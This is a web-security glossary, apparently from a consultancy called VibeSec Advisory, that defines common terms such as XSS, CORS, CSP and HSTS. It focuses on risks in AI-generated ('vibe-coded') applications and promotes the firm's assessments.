Security
glossary

Security fix instructions formatted as prompts that can be pasted directly into AI coding assistants like Cursor, Claude Code, or GitHub Copilot. Instead of traditional CVE descriptions or abstract recommendations, AI-ready remediation prompts tell your AI assistant exactly what to fix, where to fix it, and how — in the language it understands best. This approach bridges the gap between identifying a security issue and actually resolving it, reducing fix time from hours to minutes.

An attack where a malicious website loads your application inside an invisible iframe, tricking users into clicking buttons or links they can't see. For example, an attacker could overlay an invisible 'Transfer Funds' button from your banking app on top of a 'Play Video' button on their site. Prevented by the X-Frame-Options header or the Content-Security-Policy frame-ancestors directive.

An HTTP security header that tells browsers which sources of content (scripts, styles, images, etc.) are allowed to load on your page. CSP is the most powerful defense against Cross-Site Scripting (XSS) attacks. A well-configured CSP with 'script-src self' blocks injected malicious scripts even if an attacker finds an XSS vulnerability in your code. AI-generated code frequently ships without CSP or with overly permissive policies like 'unsafe-inline' that negate its protection.

A browser security mechanism that controls which external domains can make requests to your API. Misconfigured CORS — such as setting Access-Control-Allow-Origin to '*' (any origin) — allows any website to make authenticated requests to your API on behalf of your users. This is one of the most common security misconfigurations in vibe-coded applications, often introduced because AI assistants suggest permissive CORS settings to 'fix' cross-origin errors during development.

A vulnerability that allows an attacker to inject malicious JavaScript into your web application. When other users visit the affected page, the attacker's script runs in their browser with full access to their session, cookies, and data. XSS is consistently in the OWASP Top 10 and is one of the most common vulnerabilities found in AI-generated code, often caused by missing input sanitization or unsafe use of innerHTML/dangerouslySetInnerHTML.

An HTTP response header that instructs browsers to only connect to your site over HTTPS, never HTTP. Without HSTS, a user's first visit to your site could happen over unencrypted HTTP, exposing them to man-in-the-middle attacks where an attacker intercepts and modifies the traffic. HSTS should be configured with a max-age of at least one year, the includeSubDomains directive, and ideally the preload directive for inclusion in browser preload lists.

The practice of checking, filtering, and sanitizing all data received from users before processing it. Input validation prevents injection attacks (SQL injection, XSS, command injection) by ensuring that user-supplied data matches expected formats and does not contain malicious payloads. AI-generated code frequently lacks proper input validation, especially on API endpoints, because AI assistants focus on making the happy path work rather than defending against adversarial input.

The Open Web Application Security Project's list of the ten most critical security risks to web applications, updated periodically based on real-world vulnerability data. The current list includes broken access control, cryptographic failures, injection, insecure design, security misconfiguration, vulnerable components, identification and authentication failures, software and data integrity failures, security logging failures, and server-side request forgery. The OWASP Top 10 serves as a baseline standard for web application security.

A non-invasive external security evaluation that measures an application's security posture without accessing source code or impacting production systems. VibeSec's security assessment covers HTTP security headers, SSL/TLS configuration, CORS policies, DNS enumeration, and infrastructure fingerprinting. The result is a comprehensive report with findings organized by severity, an executive summary with a security grade, and AI-ready remediation prompts that can be pasted directly into AI coding assistants for immediate fixes.

HTTP response headers that instruct browsers to enable security protections for your web application. Key security headers include Content-Security-Policy (CSP), Strict-Transport-Security (HSTS), X-Frame-Options, X-Content-Type-Options, Referrer-Policy, and Permissions-Policy. Missing or misconfigured security headers are the single most common finding in VibeSec assessments — they are easy to add, provide significant protection, and are frequently omitted by AI coding assistants.

Cryptographic protocols that encrypt data transmitted between a user's browser and your server, preventing eavesdropping and tampering. TLS (Transport Layer Security) is the modern successor to SSL (Secure Sockets Layer), though the term 'SSL' is still commonly used. Every web application should enforce TLS 1.2 or higher, use strong cipher suites, and serve a valid certificate. Combined with HSTS, this ensures all connections to your application are encrypted.

The period between an AI model's training data cutoff and the present day, during which new vulnerabilities (CVEs) are discovered and disclosed that the AI cannot know about. Because AI coding assistants can only reference security information from their training data, they are inherently blind to threats discovered after their cutoff date. This gap — typically 3 to 12 months — is where real-world attackers operate, making AI-only security reviews fundamentally incomplete. Professional security assessment bridges this gap with up-to-date vulnerability intelligence.

A software development approach where developers primarily use AI coding assistants — such as Cursor, Claude Code, GitHub Copilot, Bolt, Lovable, or v0 — to generate the majority of their application's code. The developer provides high-level direction and intent (the 'vibe') while the AI handles implementation details. Vibe coding enables rapid prototyping and shipping but introduces unique security risks because the developer may not fully understand the generated code's security implications.

The practice of securing applications built primarily with AI coding assistants. Vibe coding security addresses the unique risks introduced when AI generates the majority of an application's codebase — including the 6-month gap in vulnerability knowledge, AI-introduced misconfigurations, missing security hardening, and the reduced developer familiarity with generated code. VibeSec Advisory specializes in vibe coding security, providing assessments with AI-ready remediation prompts designed to work with the same tools developers use to build.